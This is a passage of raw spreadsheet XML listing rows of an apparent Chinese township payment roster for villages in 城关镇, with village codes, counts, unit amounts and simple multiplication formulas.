      </c>
      <c r="K399" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="400" ht="23" customHeight="1" spans="1:11">
      <c r="A400" s="13" t="s">
        <v>1179</v>
      </c>
      <c r="B400" s="14" t="str">
        <f>B399</f>
        <v>城关镇</v>
      </c>
      <c r="C400" s="14" t="str">
        <f>C399</f>
        <v>东北村</v>
      </c>
      <c r="D400" s="13" t="s">
        <v>1180</v>
      </c>
      <c r="E400" s="13" t="s">
        <v>634</v>
      </c>
      <c r="F400" s="14" t="str">
        <f>F399</f>
        <v>4113210103</v>
      </c>
      <c r="G400" s="14"/>
      <c r="H400" s="14"/>
      <c r="I400" s="14"/>
      <c r="J400" s="14"/>
      <c r="K400" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="401" ht="23" customHeight="1" spans="1:11">
      <c r="A401" s="13" t="s">
        <v>1181</v>
      </c>
      <c r="B401" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C401" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D401" s="14" t="s">
        <v>1182</v>
      </c>
      <c r="E401" s="14" t="s">
        <v>242</v>
      </c>
      <c r="F401" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G401" s="14">
        <v>2</v>
      </c>
      <c r="H401" s="14">
        <v>300</v>
      </c>
      <c r="I401" s="14">
        <f>H401*G401</f>
        <v>600</v>
      </c>
      <c r="J401" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K401" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="402" ht="23" customHeight="1" spans="1:11">
      <c r="A402" s="13" t="s">
        <v>1183</v>
      </c>
      <c r="B402" s="14" t="str">
        <f>B401</f>
        <v>城关镇</v>
      </c>
      <c r="C402" s="14" t="str">
        <f>C401</f>
        <v>东北村</v>
      </c>
      <c r="D402" s="13" t="s">
        <v>1184</v>
      </c>
      <c r="E402" s="13" t="s">
        <v>1185</v>
      </c>
      <c r="F402" s="14" t="str">
        <f>F401</f>
        <v>4113210103</v>
      </c>
      <c r="G402" s="14"/>
      <c r="H402" s="14"/>
      <c r="I402" s="14"/>
      <c r="J402" s="14"/>
      <c r="K402" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="403" ht="23" customHeight="1" spans="1:11">
      <c r="A403" s="13" t="s">
        <v>1186</v>
      </c>
      <c r="B403" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C403" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D403" s="14" t="s">
        <v>1187</v>
      </c>
      <c r="E403" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F403" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G403" s="14">
        <v>1</v>
      </c>
      <c r="H403" s="14">
        <v>340</v>
      </c>
      <c r="I403" s="14">
        <f t="shared" ref="I403:I409" si="14">H403*G403</f>
        <v>340</v>
      </c>
      <c r="J403" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K403" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="404" ht="23" customHeight="1" spans="1:11">
      <c r="A404" s="13" t="s">
        <v>1188</v>
      </c>
      <c r="B404" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C404" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D404" s="14" t="s">
        <v>1189</v>
      </c>
      <c r="E404" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F404" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G404" s="14">
        <v>1</v>
      </c>
      <c r="H404" s="14">
        <v>340</v>
      </c>
      <c r="I404" s="14">
        <f t="shared" si="14"/>
        <v>340</v>
      </c>
      <c r="J404" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K404" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="405" ht="23" customHeight="1" spans="1:11">
      <c r="A405" s="13" t="s">
        <v>1190</v>
      </c>
      <c r="B405" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C405" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D405" s="14" t="s">
        <v>1191</v>
      </c>
      <c r="E405" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F405" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G405" s="14">
        <v>1</v>
      </c>
      <c r="H405" s="14">
        <v>340</v>
      </c>
      <c r="I405" s="14">
        <f t="shared" si="14"/>
        <v>340</v>
      </c>
      <c r="J405" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K405" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="406" ht="23" customHeight="1" spans="1:11">
      <c r="A406" s="13" t="s">
        <v>1192</v>
      </c>
      <c r="B406" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C406" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D406" s="14" t="s">
        <v>1193</v>
      </c>
      <c r="E406" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F406" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G406" s="14">
        <v>1</v>
      </c>
      <c r="H406" s="14">
        <v>340</v>
      </c>
      <c r="I406" s="14">
        <f t="shared" si="14"/>
        <v>340</v>
      </c>
      <c r="J406" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K406" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="407" ht="23" customHeight="1" spans="1:11">
      <c r="A407" s="13" t="s">
        <v>1194</v>
      </c>
      <c r="B407" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C407" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D407" s="14" t="s">
        <v>1195</v>
      </c>
      <c r="E407" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F407" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G407" s="14">
        <v>1</v>
      </c>
      <c r="H407" s="14">
        <v>340</v>
      </c>
      <c r="I407" s="14">
        <f t="shared" si="14"/>
        <v>340</v>
      </c>
      <c r="J407" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K407" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="408" ht="23" customHeight="1" spans="1:11">
      <c r="A408" s="13" t="s">
        <v>1196</v>
      </c>
      <c r="B408" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C408" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D408" s="14" t="s">
        <v>1197</v>
      </c>
      <c r="E408" s="14" t="s">
        <v>1198</v>
      </c>
      <c r="F408" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G408" s="14">
        <v>1</v>
      </c>
      <c r="H408" s="14">
        <v>340</v>
      </c>
      <c r="I408" s="14">
        <f t="shared" si="14"/>
        <v>340</v>
      </c>
      <c r="J408" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K408" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="409" ht="23" customHeight="1" spans="1:11">
      <c r="A409" s="13" t="s">
        <v>1199</v>
      </c>
      <c r="B409" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C409" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D409" s="14" t="s">
        <v>1200</v>
      </c>
      <c r="E409" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F409" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G409" s="14">
        <v>2</v>
      </c>
      <c r="H409" s="14">
        <v>300</v>
      </c>
      <c r="I409" s="14">
        <f t="shared" si="14"/>
        <v>600</v>
      </c>
      <c r="J409" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K409" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="410" ht="23" customHeight="1" spans="1:11">
      <c r="A410" s="13" t="s">
        <v>1201</v>
      </c>
      <c r="B410" s="14" t="str">
        <f>B409</f>
        <v>城关镇</v>
      </c>
      <c r="C410" s="14" t="str">
        <f>C409</f>
        <v>西北村</v>
      </c>
      <c r="D410" s="13" t="s">
        <v>1202</v>
      </c>
      <c r="E410" s="13" t="s">
        <v>269</v>
      </c>
      <c r="F410" s="14" t="str">
        <f>F409</f>
        <v>4113210106</v>
      </c>
      <c r="G410" s="14"/>
      <c r="H410" s="14"/>
      <c r="I410" s="14"/>
      <c r="J410" s="14"/>
      <c r="K410" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="411" ht="23" customHeight="1" spans="1:11">
      <c r="A411" s="13" t="s">
        <v>1203</v>
      </c>
      <c r="B411" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C411" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D411" s="14" t="s">
        <v>1204</v>
      </c>
      <c r="E411" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F411" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G411" s="14">
        <v>1</v>
      </c>
      <c r="H411" s="14">
        <v>340</v>
      </c>
      <c r="I411" s="14">
        <f>H411*G411</f>
        <v>340</v>
      </c>
      <c r="J411" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K411" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="412" ht="23" customHeight="1" spans="1:11">
      <c r="A412" s="13" t="s">
        <v>1205</v>
      </c>
      <c r="B412" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C412" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D412" s="14" t="s">
        <v>1206</v>
      </c>
      <c r="E412" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F412" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G412" s="14">
        <v>1</v>
      </c>
      <c r="H412" s="14">
        <v>340</v>
      </c>
      <c r="I412" s="14">
        <f>H412*G412</f>
        <v>340</v>
      </c>
      <c r="J412" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K412" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="413" ht="23" customHeight="1" spans="1:11">
      <c r="A413" s="13" t="s">
        <v>1207</v>
      </c>
      <c r="B413" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C413" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D413" s="14" t="s">
        <v>1208</v>
      </c>
      <c r="E413" s="14" t="s">
        <v>1209</v>
      </c>
      <c r="F413" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G413" s="14">
        <v>2</v>
      </c>
      <c r="H413" s="14">
        <v>300</v>
      </c>
      <c r="I413" s="14">
        <f>H413*G413</f>
        <v>600</v>
      </c>
      <c r="J413" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K413" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="414" ht="23" customHeight="1" spans="1:11">
      <c r="A414" s="13" t="s">
        <v>1210</v>
      </c>
      <c r="B414" s="14" t="str">
        <f>B413</f>
        <v>城关镇</v>
      </c>
      <c r="C414" s="14" t="str">
        <f>C413</f>
        <v>中华村</v>
      </c>
      <c r="D414" s="13" t="s">
        <v>1211</v>
      </c>
      <c r="E414" s="13" t="s">
        <v>1212</v>
      </c>
      <c r="F414" s="14" t="str">
        <f>F413</f>
        <v>4113210108</v>
      </c>
      <c r="G414" s="14"/>
      <c r="H414" s="14"/>
      <c r="I414" s="14"/>
      <c r="J414" s="14"/>
      <c r="K414" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="415" ht="23" customHeight="1" spans="1:11">
      <c r="A415" s="13" t="s">
        <v>1213</v>
      </c>
      <c r="B415" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C415" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D415" s="14" t="s">
        <v>1214</v>
      </c>
      <c r="E415" s="14" t="s">
        <v>419</v>
      </c>
      <c r="F415" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G415" s="14">
        <v>1</v>
      </c>
      <c r="H415" s="14">
        <v>340</v>
      </c>
      <c r="I415" s="14">
        <f>H415*G415</f>
        <v>340</v>
      </c>
      <c r="J415" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K415" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="416" ht="23" customHeight="1" spans="1:11">
      <c r="A416" s="13" t="s">
        <v>1215</v>
      </c>
      <c r="B416" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C416" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D416" s="14" t="s">
        <v>1216</v>
      </c>
      <c r="E416" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F416" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G416" s="14">
        <v>1</v>
      </c>
      <c r="H416" s="14">
        <v>340</v>
      </c>
      <c r="I416" s="14">
        <f>H416*G416</f>
        <v>340</v>
      </c>
      <c r="J416" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K416" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="417" ht="23" customHeight="1" spans="1:11">
      <c r="A417" s="13" t="s">
        <v>1217</v>
      </c>
      <c r="B417" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C417" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D417" s="14" t="s">
        <v>1218</v>
      </c>
      <c r="E417" s="14" t="s">
        <v>1219</v>
      </c>
      <c r="F417" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G417" s="14">
        <v>2</v>
      </c>
      <c r="H417" s="14">
        <v>300</v>
      </c>
      <c r="I417" s="14">
        <f>H417*G417</f>
        <v>600</v>
      </c>
      <c r="J417" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K417" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="418" ht="23" customHeight="1" spans="1:11">
      <c r="A418" s="13" t="s">
        <v>1220</v>
      </c>
      <c r="B418" s="14" t="str">
        <f>B417</f>
        <v>城关镇</v>
      </c>
      <c r="C418" s="14" t="str">
        <f>C417</f>
        <v>中华村</v>
      </c>
      <c r="D418" s="13" t="s">
        <v>1221</v>
      </c>
      <c r="E418" s="13" t="s">
        <v>269</v>
      </c>
      <c r="F418" s="14" t="str">
        <f>F417</f>
        <v>4113210108</v>
      </c>
      <c r="G418" s="14"/>
      <c r="H418" s="14"/>
      <c r="I418" s="14"/>
      <c r="J418" s="14"/>
      <c r="K418" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="419" ht="23" customHeight="1" spans="1:11">
      <c r="A419" s="13" t="s">
        <v>1222</v>
      </c>
      <c r="B419" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C419" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D419" s="14" t="s">
        <v>1223</v>
      </c>
      <c r="E419" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F419" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G419" s="14">
        <v>1</v>
      </c>
      <c r="H419" s="14">
        <v>340</v>
      </c>
      <c r="I419" s="14">
        <f t="shared" ref="I419:I430" si="15">H419*G419</f>
        <v>340</v>
      </c>
      <c r="J419" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K419" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="420" ht="23" customHeight="1" spans="1:11">
      <c r="A420" s="13" t="s">
        <v>1224</v>
      </c>
      <c r="B420" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C420" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D420" s="14" t="s">
        <v>1225</v>
      </c>
      <c r="E420" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F420" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G420" s="14">
        <v>1</v>
      </c>
      <c r="H420" s="14">
        <v>340</v>
      </c>
      <c r="I420" s="14">
        <f t="shared" si="15"/>
        <v>340</v>
      </c>
      <c r="J420" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K420" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="421" ht="23" customHeight="1" spans="1:11">
      <c r="A421" s="13" t="s">
        <v>1226</v>
      </c>
      <c r="B421" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C421" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D421" s="14" t="s">
        <v>1227</v>
      </c>
      <c r="E421" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F421" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G421" s="14">
        <v>1</v>
      </c>
      <c r="H421" s="14">
        <v>340</v>
      </c>
      <c r="I421" s="14">
        <f t="shared" si="15"/>
        <v>340</v>
      </c>
      <c r="J421" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K421" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="422" ht="23" customHeight="1" spans="1:11">
      <c r="A422" s="13" t="s">
        <v>1228</v>
      </c>
      <c r="B422" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C422" s="14" t="s">
        <v>219</v>
      </c>
      <c r="D422" s="14" t="s">
        <v>1229</v>
      </c>
      <c r="E422" s="14" t="s">
        <v>1230</v>
      </c>
      <c r="F422" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G422" s="14">
        <v>1</v>
      </c>
      <c r="H422" s="14">
        <v>340</v>
      </c>
      <c r="I422" s="14">
        <f t="shared" si="15"/>
        <v>340</v>
      </c>
      <c r="J422" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K422" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="423" ht="23" customHeight="1" spans="1:11">
      <c r="A423" s="13" t="s">
        <v>1232</v>
      </c>
      <c r="B423" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C423" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D423" s="14" t="s">
        <v>1233</v>
      </c>
      <c r="E423" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F423" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G423" s="14">
        <v>1</v>
      </c>
      <c r="H423" s="14">
        <v>340</v>
      </c>
      <c r="I423" s="14">
        <f t="shared" si="15"/>
        <v>340</v>
      </c>
      <c r="J423" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K423" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="424" ht="23" customHeight="1" spans="1:11">
      <c r="A424" s="13" t="s">
        <v>1234</v>
      </c>
      <c r="B424" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C424" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D424" s="14" t="s">
        <v>1235</v>
      </c>
      <c r="E424" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F424" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G424" s="14">
        <v>1</v>
      </c>
      <c r="H424" s="14">
        <v>340</v>
      </c>
      <c r="I424" s="14">
        <f t="shared" si="15"/>
        <v>340</v>
      </c>
      <c r="J424" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K424" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="425" ht="23" customHeight="1" spans="1:11">
      <c r="A425" s="13" t="s">
        <v>1236</v>
      </c>
      <c r="B425" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C425" s="14" t="s">
        <v>1237</v>
      </c>
      <c r="D425" s="14" t="s">
        <v>1238</v>
      </c>
      <c r="E425" s="14" t="s">
        <v>337</v>
      </c>
      <c r="F425" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G425" s="14">
        <v>1</v>
      </c>
      <c r="H425" s="14">
        <v>340</v>
      </c>
      <c r="I425" s="14">
        <f t="shared" si="15"/>
        <v>340</v>
      </c>
      <c r="J425" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K425" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="426" ht="23" customHeight="1" spans="1:11">
      <c r="A426" s="13" t="s">
        <v>1239</v>
      </c>
      <c r="B426" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C426" s="14" t="s">
        <v>1240</v>
      </c>
      <c r="D426" s="14" t="s">
        <v>1241</v>
      </c>
      <c r="E426" s="14" t="s">
        <v>1242</v>
      </c>
      <c r="F426" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G426" s="14">
        <v>1</v>
      </c>
      <c r="H426" s="14">
        <v>340</v>
      </c>
      <c r="I426" s="14">
        <f t="shared" si="15"/>
        <v>340</v>
      </c>
      <c r="J426" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K426" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="427" ht="23" customHeight="1" spans="1:11">
      <c r="A427" s="13" t="s">
        <v>1243</v>
      </c>
      <c r="B427" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C427" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D427" s="14" t="s">
        <v>1244</v>
      </c>
      <c r="E427" s="14" t="s">
        <v>532</v>
      </c>
      <c r="F427" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G427" s="14">
        <v>1</v>
      </c>
      <c r="H427" s="14">
        <v>340</v>
      </c>
      <c r="I427" s="14">
        <f t="shared" si="15"/>
        <v>340</v>
      </c>
      <c r="J427" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K427" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="428" ht="23" customHeight="1" spans="1:11">
      <c r="A428" s="13" t="s">
        <v>1245</v>
      </c>
      <c r="B428" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C428" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D428" s="14" t="s">
        <v>1247</v>
      </c>
      <c r="E428" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F428" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G428" s="14">
        <v>3</v>
      </c>
      <c r="H428" s="14">
        <v>320</v>
      </c>
      <c r="I428" s="14">
        <f t="shared" si="15"/>
        <v>960</v>
      </c>
      <c r="J428" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K428" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="429" ht="23" customHeight="1" spans="1:11">
      <c r="A429" s="13" t="s">
        <v>1248</v>
      </c>
      <c r="B429" s="14" t="str">
        <f>B428</f>
        <v>城关镇</v>
      </c>
      <c r="C429" s="14" t="str">
        <f>C428</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D429" s="19" t="s">
        <v>1249</v>
      </c>
      <c r="E429" s="19" t="s">
        <v>1250</v>
      </c>
      <c r="F429" s="14" t="str">
        <f>F428</f>
        <v>4113210108</v>
      </c>
      <c r="G429" s="14"/>
      <c r="H429" s="14"/>
      <c r="I429" s="14"/>
      <c r="J429" s="14"/>
      <c r="K429" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="430" ht="23" customHeight="1" spans="1:11">
      <c r="A430" s="13" t="s">
        <v>1251</v>
      </c>
      <c r="B430" s="14" t="str">
        <f>B429</f>
        <v>城关镇</v>
      </c>
      <c r="C430" s="14" t="str">
        <f>C429</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D430" s="18" t="s">
        <v>1252</v>
      </c>
      <c r="E430" s="19" t="s">
        <v>1253</v>
      </c>
      <c r="F430" s="14" t="str">
        <f>F429</f>
        <v>4113210108</v>
      </c>
      <c r="G430" s="14"/>
      <c r="H430" s="14"/>
      <c r="I430" s="14"/>
      <c r="J430" s="14"/>
      <c r="K430" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="431" ht="23" customHeight="1" spans="1:11">
      <c r="A431" s="13" t="s">
        <v>1254</v>
      </c>
      <c r="B431" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C431" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D431" s="14" t="s">
        <v>1255</v>
      </c>
      <c r="E431" s="14" t="s">
        <v>1256</v>
      </c>
      <c r="F431" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G431" s="14">
        <v>1</v>
      </c>
      <c r="H431" s="14">
        <v>340</v>
      </c>
      <c r="I431" s="14">
        <f>H431*G431</f>
        <v>340</v>
      </c>
      <c r="J431" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K431" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="432" ht="23" customHeight="1" spans="1:11">
      <c r="A432" s="13" t="s">
        <v>1257</v>
      </c>
      <c r="B432" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C432" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D432" s="14" t="s">
        <v>1258</v>
      </c>
      <c r="E432" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F432" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G432" s="14">
        <v>2</v>
      </c>
      <c r="H432" s="14">
        <v>300</v>
      </c>
      <c r="I432" s="14">
        <f>H432*G432</f>
        <v>600</v>
      </c>
      <c r="J432" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K432" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="433" ht="23" customHeight="1" spans="1:11">
      <c r="A433" s="13" t="s">
        <v>1259</v>
      </c>
      <c r="B433" s="14" t="str">
        <f>B432</f>
        <v>城关镇</v>
      </c>
      <c r="C433" s="14" t="str">
        <f>C432</f>
        <v>西北村</v>
      </c>
      <c r="D433" s="13" t="s">
        <v>1260</v>
      </c>
      <c r="E433" s="13" t="s">
        <v>1261</v>
      </c>
      <c r="F433" s="14" t="str">
        <f>F432</f>
        <v>4113210106</v>
      </c>
      <c r="G433" s="14"/>
      <c r="H433" s="14"/>
      <c r="I433" s="14"/>
      <c r="J433" s="14"/>
      <c r="K433" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="434" ht="23" customHeight="1" spans="1:11">
      <c r="A434" s="13" t="s">
        <v>1262</v>
      </c>
      <c r="B434" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C434" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D434" s="14" t="s">
        <v>1263</v>
      </c>
      <c r="E434" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F434" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G434" s="14">
        <v>2</v>
      </c>
      <c r="H434" s="14">
        <v>300</v>
      </c>
      <c r="I434" s="14">
        <f>H434*G434</f>
        <v>600</v>
      </c>
      <c r="J434" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K434" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="435" ht="23" customHeight="1" spans="1:11">
      <c r="A435" s="13" t="s">
        <v>1264</v>
      </c>
      <c r="B435" s="14" t="str">
        <f>B434</f>
        <v>城关镇</v>
      </c>
      <c r="C435" s="14" t="str">
        <f>C434</f>
        <v>中华村</v>
      </c>
      <c r="D435" s="13" t="s">
        <v>1265</v>
      </c>
      <c r="E435" s="13" t="s">
        <v>1266</v>
      </c>
      <c r="F435" s="14" t="str">
        <f>F434</f>
        <v>4113210108</v>
      </c>
      <c r="G435" s="14"/>
      <c r="H435" s="14"/>
      <c r="I435" s="14"/>
      <c r="J435" s="14"/>
      <c r="K435" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="436" ht="23" customHeight="1" spans="1:11">
      <c r="A436" s="13" t="s">
        <v>1267</v>
      </c>
      <c r="B436" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C436" s="14" t="s">
        <v>219</v>
      </c>
      <c r="D436" s="14" t="s">
        <v>1268</v>
      </c>
      <c r="E436" s="14" t="s">
        <v>916</v>
      </c>
      <c r="F436" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G436" s="14">
        <v>1</v>
      </c>
      <c r="H436" s="14">
        <v>340</v>
      </c>
      <c r="I436" s="14">
        <f t="shared" ref="I436:I446" si="16">H436*G436</f>
        <v>340</v>
      </c>
      <c r="J436" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K436" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="437" ht="23" customHeight="1" spans="1:11">
      <c r="A437" s="13" t="s">
        <v>1269</v>
      </c>
      <c r="B437" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C437" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D437" s="14" t="s">
        <v>1271</v>
      </c>
      <c r="E437" s="14" t="s">
        <v>779</v>
      </c>
      <c r="F437" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G437" s="14">
        <v>1</v>
      </c>
      <c r="H437" s="14">
        <v>340</v>
      </c>
      <c r="I437" s="14">
        <f t="shared" si="16"/>
        <v>340</v>
      </c>
      <c r="J437" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K437" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="438" ht="23" customHeight="1" spans="1:11">
      <c r="A438" s="13" t="s">
        <v>1272</v>
      </c>
      <c r="B438" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C438" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D438" s="14" t="s">
        <v>1273</v>
      </c>
      <c r="E438" s="14" t="s">
        <v>1274</v>
      </c>
      <c r="F438" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G438" s="14">
        <v>1</v>
      </c>
      <c r="H438" s="14">
        <v>340</v>
      </c>
      <c r="I438" s="14">
        <f t="shared" si="16"/>
        <v>340</v>
      </c>
      <c r="J438" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K438" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="439" ht="23" customHeight="1" spans="1:11">
      <c r="A439" s="13" t="s">
        <v>1275</v>
      </c>
      <c r="B439" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C439" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D439" s="14" t="s">
        <v>1276</v>
      </c>
      <c r="E439" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F439" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G439" s="14">
        <v>1</v>
      </c>
      <c r="H439" s="14">
        <v>340</v>
      </c>
      <c r="I439" s="14">
        <f t="shared" si="16"/>
        <v>340</v>
      </c>
      <c r="J439" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K439" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="440" ht="23" customHeight="1" spans="1:11">
      <c r="A440" s="13" t="s">
